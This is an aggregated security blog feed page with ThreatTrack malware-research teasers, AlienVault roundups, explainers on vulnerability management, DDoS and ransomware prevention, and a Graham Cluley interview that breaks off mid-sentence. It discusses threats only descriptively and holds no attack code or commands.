Monday March 9th, 2015 11:56:20 PM Mickael Nadeau
Security Risk: Critical Exploitation level: Very Easy/Remote DREAD Score: 9/10 Vulnerability: Password bypass / Privilege Escalation Patched Version: During a routine audit of our Website Firewall (WAF), we found a critical vulnerability affecting the popular MainWP Child WordPress plugin. According to, it is installed on more than 90,000 WordPress sites as as remote administrationRead More

ThreatTrack Security Labs Blog

Emerging threats and malware research

Last feed update: Saturday March 17th, 2018 09:56:24 PM

Zepto Evasion Techniques

Wednesday August 24th, 2016 04:08:02 PM ThreatTrack Security Labs
We’ve been tracking some more spam dropping Zepto ransomware variants. Like earlier posts, we’re seeing infected attachments with malicious macro scripts used as the entry point for the threat actor. (See images below of some recent spam samples.) As we dig deeper into our analysis, we found out that these macro scripts are not crafted […] The post Zepto Evasion Techniques appeared first on ThreatTrack Security Labs Blog.

Donoff Macro Dropping Ransomware

Sunday August 21st, 2016 02:43:20 PM ThreatTrack Security Labs
Recently, we’ve spotted Zepto ransomware spreading through spam email containing fake invoices (see image below). These attachments contain a Macro-Enabled word document file known as Donoff, which downloads the Zepto executable that encrypts all your files and will later ask for payment of the decryption key. We decided to take a closer look on the Donoff […] The post Donoff Macro Dropping Ransomware appeared first on ThreatTrack Security Labs Blog.

Zepto Ransomware Packed into WSF Spam

Monday July 25th, 2016 02:07:05 PM ThreatTrack Security Labs
ThreatTrack Labs has recently observed a surge of spam containing a zip attachment with a WSF (Windows Scripting File) to deliver Zepto ransomware. This tactic is a change from the common JavaScript and macro documents being spammed previously. Here are actual emails featuring familiar social engineering tactics: The zip attachments contain the WSF.   An Interactive […] The post Zepto Ransomware Packed into WSF Spam appeared first on ThreatTrack Security Labs Blog.

A Look at the Cerber Office 365 Ransomware

Wednesday July 13th, 2016 01:31:49 PM ThreatTrack Security Labs
Reports of a Zero-day attack affecting numerous Office 365 users emerged late last month (hat tip to the researchers at Avanan), and the culprit was a new variant of the Cerber ransomware discovered earlier this year. As with the other Zero-day threats that have been popping-up like mushrooms of late, the main methods of infection […] The post A Look at the Cerber Office 365 Ransomware appeared first on ThreatTrack Security Labs Blog.

A Close Look at TeslaCrypt 3.0 Ransomware

Wednesday June 8th, 2016 04:38:00 PM ThreatTrack Security Labs
TeslaCrypt is yet another ransomware taking the cyber world by storm. It is mostly distributed via a spear phishing email and through the Angler exploit kit. The Angler exploits vulnerability in Adobe Flash. The Angler exploit downloads a variant of the ransomware upon success. TeslaCrypt 3.0 possesses various updates, one of which renders encrypted files […] The post A Close Look at TeslaCrypt 3.0 Ransomware appeared first on ThreatTrack Security Labs Blog.

The Day the Earth Stood Still for CryptoWall

Wednesday May 25th, 2016 06:22:16 PM ThreatTrack Security Labs
It’s been the norm in the cybersecurity industry to be intrigued and at the same time be infuriated by the people behind any successful large-scale malware attack. Ransomware is one such example. It’s been slowly released in the wild since the early 2009, but CryptoWall redefined the meaning of ransomware and took it to the […] The post The Day the Earth Stood Still for CryptoWall appeared first on ThreatTrack Security Labs Blog.

Understanding the Latest Version of Locky Ransomware

Wednesday May 18th, 2016 05:58:05 PM ThreatTrack Security Labs
It is one of the most prevalent spam malware in the wild today: Locky ransomware. The Locky malware authors started their campaign last year but didn’t become very active until January 2016 – and they haven’t slowed down since. Locky e-mails usually come in with an attached zip archive and once extracted may contain a […] The post Understanding the Latest Version of Locky Ransomware appeared first on ThreatTrack Security Labs Blog.

A Glimpse at Petya Ransomware

Tuesday May 3rd, 2016 02:09:58 PM ThreatTrack Security Labs
Ransomware has become an increasingly serious threat. Cryptowall, TeslasCrypt and Locky are just some of the ransomware variants that infected large numbers of victims. Petya is the newest strain and the most devious among them. Petya will not only encrypt files but it will make the system completely useless, leaving the victim no choice but […] The post A Glimpse at Petya Ransomware appeared first on ThreatTrack Security Labs Blog.

Breaking Down the Malware Behind the Ukraine Power Outage

Thursday March 17th, 2016 01:00:30 PM ThreatTrack Security Labs
Security researchers recently discovered that the power outage in the Ukraine in December was caused by a malware and identified as an evolved version of BlackEnergy. This Trojan, dating back to 2007, was a popular malware that was previously sold in Russian underground sites. However, its design and architecture changed from performing simple HTTP DDos attacks to […] The post Breaking Down the Malware Behind the Ukraine Power Outage appeared first on ThreatTrack Security Labs Blog.

What’s New with Dridex

Thursday February 25th, 2016 02:00:06 PM ThreatTrack Security Labs
Credit: Christopher D. Del Fierro, Lead Malware Research Engineer, ThreatTrack Security We have seen Dridex since 2014 and it is still active in the wild today. This research will be focusing on analyzing Dridex and on how it is able to remain undetected by most antivirus engines. For those not familiar with Dridex, it is a malspam […] The post What’s New with Dridex appeared first on ThreatTrack Security Labs Blog.

AlienVault Blogs
The most recent posts from across the AlienVault blogs.

Last feed update: Saturday March 17th, 2018 09:56:25 PM

Things I hearted this week 16th March 2018

No timestamp info...
Last weekend, my daughter and I finally got around to watching Wonder Woman. We quite enjoyed it. There was a part in which Chris Pine’s character said, “My father told me once, he said, "If you see something wrong happening in the world, you can either do nothing, or you can do something". And I already tried nothing." So, I turned to my daughter and asked, "When you're older will you say awesome quotes and attribute them to your dad so I'll appear all knowing and wise?" She replied, "Yeah, I'll say 'my father told me if you see something wrong you can either do nothing, or send memes'". Not sure if that means I’ve succeeded as a Dad or failed miserably. Hopefully she’ll come across one of these posts in the future and realise there was more to me than just memes. Operation Bayonet This article gives a fascinating insight into how law enforcement infiltrated and took down a drug market. As reports of these kinds of operations become available, Hollywood should really be looking to these for inspiration. Far better plots than most fiction! Operation Bayonet: Inside the sting that hijacked an entire dark web drug market | Wired How many devices are misconfigured… or not configured? I saw this blog that Anton Chuvakin posted over at Gartner stating that there’s a lot of security technology which is deployed yet misconfigured, not configured optimally, set to default, or deployed broken in other ways. Broadly speaking, I agree, in the race to get things done, assurance often takes a back seat. But there’s no obvious answer. Testing takes time and expertise. Unless it’s automated. But even then someone needs to look at the results and get things fixed. DevSecOps maybe? How Much of Your Security Gear Is Misconfigured or Not Configured? | Gartner Hacking encrypted phones Encrypted phone company Ciphr claims it was hacked by a rival company. A preview into how vicious digital rivals can get. And regardless of who is to blame, the fact remains that the real victims here are the users. Customer Data From Encrypted Phone Company Ciphr Has Been Dumped Online | Motherboard Hidden Cobra on Turkish Banks Bankshot implants are distributed from a domain with a name similar to that of the cryptocurrency-lending platform Falcon Coin, but the similarly named domain is not associated with the legitimate entity. The malicious domain was created December 27, 2017, and was updated on February 19, only a few days before the implants began to appear. These implants are variations of earlier forms of Bankshot, a remote access tool that gives an attacker full capability on a victim’s system. This implant also contains functionality to wipe files and content from the targeted system to erase evidence or perform other destructive actions. Bankshot was first reported by the Department of Homeland Security on December 13, 2017, and has only recently resurfaced in newly compiled variants. The sample we analyzed is 99% similar to the documented Bankshot variants from 2017. Cash-strapped North Korea hacked Turkish banks through Flash | Fast Company Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant | McAfee Hidden Cobra IOC’s | OTX SWIFT says blockchain not ready for mainstream use SWIFT, the Brussels-based messaging system which handles around half of all high-value cross-border payments has been playing around with blockchain. It says that while the test went extremely well, it concluded that further progress is needed on the blockchain. Chris-John Riley summed up the situation on Twitter mused, “Company that makes its money from slow money transfers, says new technology that would make it obsolete isn’t ready yet #MildShock” Swift says blockchain not ready for mainstream use | Financial Times The secret life of your login credentials When your data leaves your machine, where does it go? What happens to it along the way? And what systems have been put in place to ensure that your information is kept private as it travels, and after it arrives at its final destination? The short answer is: quite a lot. So strap in as we take you on a tour of the secret life of your username and password in order to expose the trials and tribulations of keeping a secret on the web. The secret life of your login credentials | Bradfield On the topic of logins Two-factor authentication gets simplified with a new sonic vibration token | TechRepublic SharpShooter Getting a foothold is often one of the most complex and time-consuming aspects of an adversary simulation. We typically find much of our effort is spent creating and testing payloads against various OS versions/architectures and against the most commonly used EDR (Endpoint Detection and Response), anti-virus and sandboxing solutions. Many of these solutions have become more focused and aware of PowerShell, as such we’ve naturally moved away from PowerShell to research other techniques for getting into memory and evading endpoint defences. This led to the development of an in-house payload generation framework we named SharpShooter. After using this framework with great success across a number of engagements, we have opted to release the tool. Payload generation using SharpShooter | MDSec Former Equifax Executive Charged With Insider Trading “As alleged in our complaint, Ying used confidential information to conclude that his company had suffered a massive data breach, and he dumped his stock before the news went public,” said Richard R. Best, Director of the SEC’s Atlanta Regional Office.  “Corporate insiders who learn inside information, including information about material cyber intrusions, cannot betray shareholders for their own financial benefit.” Former Equifax Executive Charged With Insider Trading | U.S. Securities and exchange commission Equifax CIO Put ‘2 and 2 Together’ Then Sold Stock, SEC Says | Bloomberg       

Explain Vulnerability Management

No timestamp info...
All software and hardware has vulnerabilities. So do the non-computing aspects of your organizational security, such as the physical security of your building or how susceptible your employees are to social engineering. Vulnerabilities are everywhere and are in everything. The key to good security is to know how to manage your vulnerabilities. What are they? Where are they? How can they be patched? How can they be mitigated? Which risks are you willing to take? What is Vulnerability Management? Vulnerability management is a continuous process of testing, reporting, response, and triage. Bruce Schneier is famous for saying, “Security is a process, not a product.” That very much applies to vulnerability management specifically, as well. You don’t just design systems, configure them, and deploy them. Every day at work you should discover and think about your vulnerabilities and consider how you’ll deal with them. Two major aspects of your security work will change constantly, whether you like it or not. One is your network and computing infrastructure. New applications will be deployed and patched. New hardware will be introduced. New people will be hired. Policies will be changed. Sometimes regulations change as well. The second constantly changing aspect is the threat landscape. At least one point of your network will be connected to the public internet and new malware and cyber attack bots appear all the time. The way they cyber-. attack and the ways they evade detection will also evolve. New malware can also be introduced to your network through removable media and bring-your-own-devices. There are also social engineering and physical (often building related) attack vectors. All of those factors evolve and change and that’s the main reason why vulnerability management must be a continuous process. You will also learn something new everyday. If not, you’re doing something wrong. The Vulnerability Management Process The first phase of the vulnerability management process is asset discovery. You need to know what’s deployed on your network, which is increasingly difficult with BYOD and lines of business going off and “doing their own thing” outside of IT. You will learn about vulnerabilities in your network through sources like the CVE security management database, network vulnerability testing, vendor announcements, your logs and your SIEM, reports from your staff, and unfortunately sometimes in the wake of real cyber attacks. Do make sure you record your vulnerability discoveries in as much detail as possible, and preferably in a way that’s only accessible to the people who need to know about them. Reports should also be organized according to which aspects a vulnerability pertains to, such as an application your network uses, or a physical building vulnerability. Because vulnerabilities pertain to all the aspects and facets of your network, you should have lots of different categories. Regulations and compliance standards, as well as company policy, must also be considered. Depending on your company, industry, and jurisdiction, there may be specific standards that your vulnerability management reporting must conform to. Over time, you will inevitably discover and report a lot of vulnerabilities. A good prioritization process will help you triage your vulnerabilities so you can respond to them more effectively. One important and useful way to categorize your vulnerabilities is according to urgency. Obviously more urgent vulnerabilities should be dealt with first. What are the possible consequences of a particular vulnerability being exploited? How much money is at stake? Is there any possible harm to real people? How large is the attack surface corresponding to a vulnerability? How many of your machines, appliances, applications, or physical entities are at risk? Is the cost of protecting an asset less than the cost of it being attacked? The next phase is your risk response. That will be somewhat related to your prioritization. You can categorize your risk responses according to which risks you can remediate, mitigate, or accept. Sometimes very difficult decisions have to be made. An asset that would cost more to secure than lose may possibly correlate with a risk you decide to accept. Or you might decide that it’s important enough for employees to be able to bring their own devices into your network that you accept the significant amount of risk that introduces. Patchable software vulnerabilities are remediate-able risks, but patching can also bring it’s own challenges. Note: in some cases mitigating risks could be a matter of taking a hardware device with too many vulnerabilities out of your network and replacing it with a device with fewer vulnerabilities. Vulnerability Management in a Nutshell Proper and effective vulnerability management requires a certain mindset and attitude. You must understand that everything has vulnerabilities. Your network and the threat landscape will evolve over time, and you must keep on your toes. Difficult decisions will have to be made sometimes. There are multiple sources for vulnerability information and also multiple ways you can deal with them.       

Infosec Language Grows Up: The Bishop Fox Cybersecurity Style Guide

No timestamp info...
  On February 15, Bishop Fox released their Cybersecurity Style Guide. I am absolutely stoked for them, and for the arrival of what looks like a new era in InfoSec language consistency. I was lucky enough to get to speak to Technical Editor Brianne Hughes last week. “I polled the internal team,” she told me, “and got the sent back to me a few times. We need to be consistent as a department – Engineers want to know why, they want transparency, and they don’t want to be told what to do. We have lively dialog in the comments of our reports.” She went on to say, “InfoSec merges hacker slang and military jargon in a corporate setting, and it’s hard to find middle ground. The language itself is a kind of slang, and the point of slang is to identify in-groups and out-groups, so there’s a definitely border built up that were looking to poke holes in to facilitate future conversations.” Largely, those of us lucky enough to work for InfoSec companies enlightened enough to know that having editorial services available is a good thing, have mostly done our thing solo, and we’ve collected language that’s specific for our company. As a new editor in that position, there’s always that little moment of hesitation, where you try to decide what style guide to leverage. Microsoft, with its monolithic 1990’s tablet-down-from-the-mount style guide? Sun Microsystems, where once upon a time the collective Editorial staff met to decide the proper way to write “readme,” only to decide after four straight hours of heated argument that since the users knew what we meant, we would willfully refuse to standardize? There’s the Yahoo Style Guide, the Salesforce Style Guide… everyone’s got one, and most editors have a favorite. But this is the first time I’m aware of that someone specifically in the world of InfoSec has taken a stab at creating something like unification, by not only creating a guide, but actively promoting it, and soliciting input from across the industry. “I made this for myself because I needed it,” says Brianne. “And I was lucky enough to have the skills and the support. It’s a beautiful environment where Bishop Fox has been around 12 years, but allows for passion projects.” The second it downloaded, I sat down and read every word. You guys… this is superlative. Some highlights include: A technical formatting section simple enough to cover our needs, without going over the top to cover every possible contingency.   An appendix explaining how decisions were made. This is particularly glorious, because mostly, we’re winging it. The Wild West style of InfoSec netymology has meant that most of us within our silos make a choice, and call it done. There’s been very little in the way of guidance about how to make those decisions. I think that if we, as editorial professionals, can help each other make consistent choices, the entire field will mature more rapidly, and that is all to the good for improving consistency and transparency of dialog between professionals and their clients.   Another appendix for external resources. This is so beautifully thought-out, so comprehensive… I felt myself sighing in pure appreciation. I personally have somewhat different baseline preferences (we use Merriam-Webster at AlienVault, rather than Webster’s), but the majority of the resources cited are exactly what I’d have picked to share. I’m especially pleased to see the Conscious Style Guide in there. Brianne says, “I’d love to frivolously tweet language puns. But I’m a real person in the real world, providing a platform and a voice to welcome those who aren’t being welcomed. I want to meet security where it is now… but here are some alternatives for how to start thinking about language. Think before you write…part of that is actively welcoming, not passively excluding.” The list itself. Anyone can make a word list, but this word list has humor, has verve… it’s clear that Brianne was having fun with this, as evidenced by the entry for QA: QA: Short for Quality Assurance. Everyone needs an editor. 🙂 Is that not the coolest? A guide like this does best with community buy-in, and community participation. The Editorial Team at Bishop Fox is accepting suggestions and comments here: I don’t know about the other InfoSec editors out there, but I’m standing on my chair cheering for the whole Bishop Fox team. Well done!       

Countering Crypto-Malware: A Guide to Preventing a Ransomware Infection

No timestamp info...
Ransomware had what Malwarebytes describes as a "banner year" in 2017. In the 2017 State of Malware report, telemetry gathered by the anti-malware provider reveals that business and consumer ransomware detections swelled by 90 percent and 93 percent, respectively. The monthly rate of ransomware attacks against businesses grew by approximately 10 times the rate of 2016 over the same period in 2017. A 700 percent increase in ransomware helped drive that surge, with GlobeImposter and WannaCry leading the way. Malwarebytes 2017 State of Malware report page 6 Overall, Malwarebytes saw new ransomware development stagnate in the second half of 2017 as digital criminals shifted their focus to bring back old threats like banking Trojans and embrace new techniques, most notably malicious cryptocurrency miners. Those trends notwithstanding, ransomware isn't going away anytime soon. Users should therefore follow these five simple steps that can help them stay safe from a ransomware attack. Install an Anti-Malware Solution While some digital attackers are turning to fileless malware, many ransomware strains still come with a digital signature. Anti-malware solutions can use these imprints to detect and block a crypto-malware threat before it has time to execute on a computer. Victims of ransomware can also use these tools to clean their computers of ransomware before they restore their data using a free decryption tool or available backup. Update Your Systems Regularly A common delivery vector for ransomware is an exploit kit. It's a type of software package that scans for known vulnerabilities in Adobe Flash Player and other programs. If it finds a match with its hardcoded exploits, the kit launches code that exploits the vulnerability and in turn downloads ransomware onto the vulnerable machine. By staying current with software patches, however, users can block exploit kits from activating on their computers. How Exploit Kits Work. (Source: Barkly) Avoid Suspicious Links and Email Attachments As seen in the graphic above, one of the most common beginnings of an exploit kit campaign involves a phishing email recipient clicking on a malicious link that redirects them to a compromised website. Users aren't powerless against these tactics. They can make a point of not clicking suspicious links and email attachments, including those that come with messages sent to them from unfamiliar senders. Disable Macros for Office Documents Microsoft Office documents come with what's called macros. They are essentially rules that users can craft in order to save time by automating repetitive tasks. Unfortunately, digital attackers often hide ransomware executables within Office macros and attempt to capitalize on users' curiosity by tempting them with an unknown attachment. Users can protect themselves against this trick by disabling macros in Office, by steering clear of unsolicited attachments, and by making it a rule to not enable macros in any document should they receive a prompt to do so. Install a Pop-Up Blocker Bad actors don't just rely on email to distribute ransomware. They also use malvertising for delivery. In a typical malvertising campaign, a bad actor gains the trust of an advertising network by posting clean advertisements. They then abuse that trust by posting a malicious ad on a website of their choosing. This ad could pop up and redirect a user to a website compromised with ransomware before they've even had a chance to click. Acknowledging that threat, users should install an ad-blocker onto their machines and use it to prevent the automatic execution of ads on all sites they visit. Sometimes, Luck Is Evasive…. Users can implement the steps described above along with other precautions and still suffer a ransomware infection. Acknowledging that possibility, it's important that users create and test a robust data backup strategy. They can learn how to do so here. For advice on how to respond to an active ransomware infection, click here.       

Things I hearted this week 9th March 2018

No timestamp info...
It’s been an uneventful week for the most part. I did spend a lot of time reading tweets by Today In Infosec. If you don’t know of it, I suggest checking it out. As the name suggests, it tweets out news from the world of information security from previous years. I was thinking that maybe I could wait five years and then recycle these weekly roundup blogs as “This week in Infosec” But that’s the future, let’s jump into the news that matters today. An Olympic hack What went on behind the scenes at the Olympics? How much hacking went on, who was behind it, and what can be done about it? Lessons in Cyber: Influence Operations | Comae technologies (the Grugq) 2018 Winter Olympic Games have been hacked, organizers confirm | Digital trends Russian spies hacked the Olympics and tried to make it look like North Korea did it, U.S. officials say | Washington Post SAML, SSO many vulnerabilities SAML-based single sign on systems have some vulnerabilities that allow attackers with authenticated access to trick SAML systems into authenticating as different users without knowledge of the victims’ password. Sounds like a lot of fun. Duo Finds SAML Vulnerabilities Affecting Multiple Implementations | DUO Passhunt I came across this little gem on GitHub this week. Basically, it’s a repository of default credentials for a plethora of network devices, web apps, and so forth for over 500 vendors and near 2100 default passwords. Remember, Mirai originally only had 61 default passwords to wreak havoc. Passhunt | GitHub Sharing is caring If you give your information to a business, how many places do you think it shares that information with? None, a dozen, fifty? Well, thanks to GDPR compliance, PayPal has shared a list of over 600 entities it shares data with. List of Third Parties (other than PayPal Customers) with Whom Personal Information May be Shared | PayPal Related What Amazon Echo and Google Home do with your voice data | Wired MoviePass CEO admits company creepily tracks users | New York Post Single Photo uniquely identifies Smartphone that took it | The Security Ledger Amazon working to fix Alexa after users report random burst of 'creepy' laughter | Guardian The case against hack porn Joseph Cox at Motherboard raises an interesting point, that while new research is valuable, many times, it is only applicable in the realm of research, or for Bond films. Personally, I feel that it’s important to allow and encourage new and innovative ways to hack into things. But it’s worth bearing in mind that very few people or companies are hacked with highly sophisticated techniques. The more we can do first to raise the bar to address fundamentals the better. Against Hack Porn | Motherboard Risk Resilience is the future We are often told about how a big breach can affect a company’s profits, impact its share price, and basically mean bad news. But as more data is available and we can see the impact of breaches, the general consensus is that while the share price may suffer a major dip in the aftermath of a breach, it is often forgotten in about 12 months. In this well-written article, Daniel Miessler discussed how companies should focus on resilience, avoiding disruption, and human safety. When Companies Stop Caring About Data Loss, Risk Will Be Resilience-based and Focused on Business Disruption and Human Safety | Daniel Miessler Marcus Hutchins A really well-written piece on Marcus Hutchins aka Malware Tech Blog. Hard to appreciate how his life has literally been turned upside down. Gray Hat | NYMag Regulating the IoT Left to their own devices, it’s unlikely that manufacturers will willingly spend time and resources hardening or securing smart devices. So, it’s likely some form of regulation will force some changes soon. Regulating the IoT: Discrimination, Privacy, and Cybersecurity in the Artificial Intelligence Age | SSRN Smart device security guidelines 'need more teeth' | BBC Somewhat related to IoT as it involves self-driving cars being attacked. Or as they say, “rage against the machine” Raging human drivers slap, body slam innocent self-driving cars | Ars Technica Cryptocurrencies I keep thinking to myself that this week I’ll try to steer clear of any cryptocurrency-related news, yet there are always a couple that catch my eye and I think they’d be interesting to include. If for nothing else, just to keep track of how issues are evolving and developing in this new world. Ethereum fixes serious “eclipse” flaw that could be exploited by any kid | ars technical Bitcoin is not anonymous and is easy to track, says Met police chief | The Telegraph US authorities call on cryptocoin 'exchanges' to sign up for regulation | The Register       

Explain What DDoS Is

No timestamp info...
Your favorite website goes offline. That firewall in your office network isn’t filtering anything and is overwhelming the server machines that it is connected to. If an LDAP port is hit by a DDoS attack, you have no Active Directory securing the user accounts on your Windows client PCs. Maybe an IMAP server was hit, so now you have to actually phone your boss because she cannot communicate with you via email. You sit in your cubicle, unable to log into your PC because LDAP was DDoS attacked. Accessing your work email on your phone is a waste of time because your employer’s email server won’t work if it’s the DDoS target instead. And to all of that, the web forums on fly fishing you usually kill time with are offline because they were hit by a DDoS attack as well! The network administrator steps out of the datacenter and announces to your office that the company’s firewalls and servers were hit by a DDoS attack. But there’s no need to worry, because she will bring everything back online within the next ten minutes. What happened?​ A DDoS attack, Explained​ DDoS is an acronym for Distributed Denial of Service. A simple Denial of Service could be a technical accident where something such as a memory buffer overflows and the affected device is forced to shut down because of it; however, DDoS attacks are no accident. They are deliberate, malicious cyber-attacks.​ The targeted network appliance or server denies usual service because it has been deliberately overwhelmed with data packets. Imagine five hundred people trying to run through a doorway at the same time. The service that the doorway usually provides by allowing people to go from one room to another will obviously no longer work. The doorway has a finite capacity, same as a firewall and memory buffer in your server application.​ DDoS attacks are conducted deliberately by cyber attackers. The most common way that DDoS attacks are conducted these days is by leveraging control of a botnet. A botnet is a network of “bots,” usually through the internet. The bots are usually PCs, mobile devices, and IoT devices which have malware on them that allows a cyber attacker to use their computing power through their command and control server. When the attacker finds a public IP address that they want to target, they will command their bots to send as many data packets to the IP as possible. All of those packets all at once will overwhelm whichever device and software the IP is connected to, and it will go out of service.​ Occasionally these days but more frequently in the 1990s, a web server’s website could go offline if too many people try to download webpages from it at the same time. Big tech companies like Google and Amazon have massive datacenters around the world which consume more electricity than some countries. They can handle millions of people trying to use their web services at the same time. But if I install Apache on an old PC on my LAN and put a website on it, it won’t have anywhere near the same capacity. Hundreds of people trying to download a webpage at the same time might overwhelm my home router and my modest PC, and it will go offline. That’s the sort of denial of service that’s an innocent accident. But DDoS attacks are no accidents. They’re also distributed, which means that many different devices are working in unison to flood an IP with packets.​ Explain Types of DDoS attacks​ The OSI layer model describes seven layers which constitute a networked computing entity, usually through TCP/IP.​ The seventh layer is the application layer. If a DDoS attack overwhelms the memory buffer of my server application, then it’s a layer 7 DDoS attack. ​ A common type of layer 7 attack is an HTTP flood. It’s when HTTP or HTTPS on a web server is targeted and overwhelmed with GET requests. Your computer made a GET request in order to download this webpage. Your computer, your web browser, and this web server all performed according to how they were designed. An HTTP flood attack exploits that design in order to do harm.​ The third OSI layer is the network layer. The actual layout of a network, which machines are connected to which other machines and their paths are manifested at the third layer. The fourth OSI layer is the transport layer. All packets which go through TCP/IP, the backbone of both the internet and private networks, are either TCP or UDP. The headers of those packets help determine how they are routed through a network and that action is manifested at layer four.​ Protocol attacks are a type of DDoS attack which uses the third and fourth OSI layers. A botnet could send a targeted IP address a bunch of spoofed SYN packets, which are just a way of saying “look at me!” A service running on a TCP/IP port is supposed to return SYN/ACK packets. “I see you, I acknowledge you!” But if too many bad SYN packets are sent, the SYN/ACK packets may not know where to go, and the device connected to the IP will likely go out of service.​ Volumetric attacks are another common type of DDoS attack. All networks have a finite amount of bandwidth. A volumetric attack tries to fill a network’s bandwidth as much traffic as it possibly can, on as many TCP/IP ports and devices as possible. The goal for a cyber attacker is to fill a targeted network with so much of their rubbish that there’s no room for legitimate network traffic and the devices on the network are forced to shut down.​ DDoS attacks are usually easy to recover from, but allow for worse cyber attacks​ Network administrators value uptime more than most anything else. That’s understandable, when a server goes offline it makes a network service unavailable and a company could possibly lose business transactions and money. A proper server is supposed to be online at all times, including when it’s 3am on Christmas morning in your time zone. Many networks will build redundancy so that if some servers need to be shut down for any reason, other servers which perform the same function will be up and users will experience no disruption in service.​ Recovering from a DDoS attack usually involves rebooting computers and network appliances and then restarting servers and other services. A cybersecurity minded network staff will record their incident response and analyze how they can better secure their network in the aftermath. But DDoS attacks can be recovered from relatively quickly. So why are DDoS attacks so attractive to cyber attackers?​ Some cyber attackers may be hacktivists who just want to see a website they don’t like go offline for a few minutes or a few hours. But here’s the most common motive for a DDoS attack. DDoS attacks are a distraction. Network administrators should respond to them immediately so they experience as little downtime as possible. The problem is, while they’re doing that, they cannot watch their network for other attacks. Even if the DDoS targets are only offline for a few minutes, those few minutes may give an attacker plenty of time to conduct a data breach or acquire malicious remote access to your computers and network-attached storage.​ DDoS attacks can be mitigated by having redundant servers and network appliances, having intrusion detection and intrusion prevention systems, improving firewalls, having redundant physical sites for your network, having redundant public IP addresses, having a good SIEM to feed your logs into, and skilled network and cybersecurity professionals to watch everything.       

An Interview with Graham Cluley

No timestamp info...
I can’t remember what year I first met Graham Cluley. It may have been around 2006 at an awards event of some sort. We were both nominated in the same category; I believe it was for best security blogger. Graham was already well-established with many awards under his belt, whereas I was the jittery newbie, glad to have even been nominated for anything at all. As you may have guessed, Graham won that night. Usually I’d force a smile, congratulate the winner with some hollow words and then drown my disappointment at the buffet. But Graham is quite the quintessential gentleman. He sat and chatted with me throughout the evening, sharing tips and techniques and being overall very encouraging. I’ve kept an eye on his career ever since and stayed in touch with him. I felt like it was worth getting some time once again and talking through what makes him tick. You’ve been in the industry for a long time, what’s the secret to staying so apparently happy and enthusiastic - not to mention retaining a full head of hair? Life is so ghastly and absurd that it's impossible to take it too seriously.  One of my failings is that I have a pitifully low boredom threshold, and find it a hard thing to disguise.  This isn't a good thing, and has probably harmed my career immensely. Recently my wife says she's spotted a couple of grey hairs on my head, so it does appear that I am mortal My brothers don't seem to have lost their hair either, so it must be something in the Cluley gene pool.  That or the fact I spent the first eighteen years of my life eating only cheese sandwiches. There were your early days at Dr. Solomon’s, the Naked Security era, and now your life as an independent expert - with a more respected brand than most companies have. Was this a planned journey? How did your career end up here? I don't really think I have a career.  I find it hard to describe to people what exactly it is that I do for a job.  When I meet up with my brothers, they're baffled as to how I'm able to make a living too. So, there was no planned journey to get to this point.  At college, I wrote and sold computer games, and they're what got the attention of Alan Solomon who offered me a job as a programmer in the early days of anti-virus. I left Dr. Solomon's (which was a fun place to work) because they got acquired by McAfee (who didn't seem very fun).  I joined Sophos because it was a small fun company, and then left when it became big and stopped being fun. I make decisions like these fairly impulsively.  Something will switch in my head and make me say, "I'd rather do something fun", and then that's it, my mind’s made up. Life is a little different now as I have a wife and young son, and I need to remind myself that I have some responsibilities.  If they weren't in my life, it's quite possible that I would be doing something other than computer security.  But I do enjoy finding new things to do – and my latest obsession is the weekly podcast I co-host with Carole Theriault. You’re a pretty public figure, but what little-known fact about your background usually surprises people? While I was studying at university, my girlfriend joined a cult.   I tried for years to get her out, without success.  That was pretty horrible, but I met a lot of good people and - hopefully - helped some other people leave a destructive group. There, that ruined the mood! Yeah it did… ok moving swiftly on. You’ve done technical roles, non-tech roles, you’re a writer, speaker, media commentator, YouTuber, podcaster, amongst many other things. What is the role, or job that you enjoy the most, or have enjoyed the most over the years? I really enjoy public speaking.  There's nothing quite like it, and you get the instant reaction of an audience to make you feel good about yourself. The other thing right now is editing podcasts.  Such such fun!  It's amazing how many hours you can spend tweaking what at the end probably sounds like an unedited 30-minute conversation. Conversely, what part of the job do you not like at all? I hated managing people.  When I worked for big firms they kept trying to "reward" me with management positions, providing teams to work underneath me.  This seemed crazy to me.  If I was good at one thing, why would that mean I would also be good at managing people?  And even if I *was* good at it, why was it assumed that managing a team would be the best use of my time rather than letting me do the thing I was really good at that they were presumably paying me the megabucks for? The way I got around this was by attempting to promote my staff to ultimately be my boss, effectively reversing our roles.  This strategy actually worked a few times. Who were your mentors, or greatest influences along the way? Alan Solomon - a very clever, and very funny chap.  He and his wife Susan had faith in me and I learnt a lot from them. Who is your favourite fictional character? John McAfee. I heard that you were once mentioned by a malware author in their virus. Is this true? I think you're talking about Gigabyte, a Belgian virus writer whose real name is Kim Vanvaeck. Back in the mists of time, I made some comments to the media about women being too sensible to write malware.  Kim somehow misconstrued this as me saying that girls weren't capable of writing viruses, which is, of course, nonsense. Anyway, she wrote some viruses which mentioned me and my favourite sandwich filling, and invited computer users to throw a coconut at my head to ensure that less files were infected on their hard drives. She got caught by the police, but was never charged as far as I know. However, I do believe she turned her back on malware writing many years ago, so that gets the thumbs up from me. How many awards in total have you won over the years? And don’t pretend like you don’t know the exact number! Come on. What is this? A serious interview! Give me something. I'll tell you this - my first ever award was runner-up in a Cow & Gate beautiful baby competition. What would you say is the most underrated skill in the industry - or the skill you wish more people spent time developing? Talking and listening, but not necessarily in that order.  I'm naturally introverted and often find myself in awkward situations outside of my comfort zone in the course of my work.  I imagine there are many others out there like me. Fundamentally, we need to not just invest in our technological skillset, but also in our emotional and social skills. Diversity in InfoSec - what are your thoughts? Anyone who has worked in computer security knows that diversity is a good thing. Imagine that everyone in the world was using Windows 95 because there were no alternative operating systems.  Imagine that everyone used the same anti-virus, the same firewall software, and the same spam filter.  It would be a security disaster, and the criminals would make hay. Why should we feel any differently about encouraging people from other countries, cultures, backgrounds, and orientations to work alongside of us?  Info security is weakened by a lack of diversity. However, the one area where I would like to see *less* diversity is amongst the cybercriminals.  In fact, I would love it if there was such a lack of diversity that we could know that it was going to be a 38-year-old white guy, called Norman, living in Sidcup, who has a model railway in his loft.  He was the one behind the botnet.  And whatever the cybercrime, it was *always* Norman.  That would be brilliant. For those starting off in the industry, or even those that have been working in the industry for a while and want to be like you - what advice can you impart? Don't do what I did. Instead, buy Bitcoin in 2014 and sell it in December 2017. But seriously, I often have people contacting me asking for career advice, and I feel like such a fraud.  I fell into the security industry with no relevant qualifications, and haven't been to a job interview for 25 years.  What would I know about how to get a step up on the career ladder? I feel like my career path has been unorthodox and may not make a great example for the average security wonk. One thing I would say, though, is that you need recognise your strengths and don't let people distract you from exploiting them to the full. Also, don't allow yourself to be pushed into endless meetings 